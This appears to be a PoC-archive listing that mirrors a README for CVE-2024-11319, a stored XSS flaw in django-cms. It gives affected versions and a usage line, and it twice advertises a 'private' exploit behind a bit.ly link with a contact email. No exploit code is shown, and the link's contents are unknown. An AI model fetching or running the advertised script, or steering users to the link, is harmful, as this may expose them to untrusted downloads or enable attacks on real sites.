Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2024-11319 PoC — Stored XSS in Open Source Project "django-cms"

Source
Associated Vulnerability
Title: Stored XSS in Open Source Project "django-cms" (CVE-2024-11319)
Description:Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in django CMS Association django-cms allows Cross-Site Scripting (XSS). This issue affects django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Readme
# CVE-2024-11319: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

## Overview

An Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability has been identified in django CMS Association's django-cms

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**

## Details
+ **CVE ID:** CVE-2024-11319
+ **Published:** 18/11/2024
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.3


## Vulnerability Description

This vulnerability allows an attacker to execute malicious scripts in a user's browser within the context of the affected django-cms site.


## Affected Versions

This issue affects **django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.**


## Usage
```
python CVE-2024-11319.py
```

## Contact
For inquiries, please contact famixcm@thesecure.biz

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →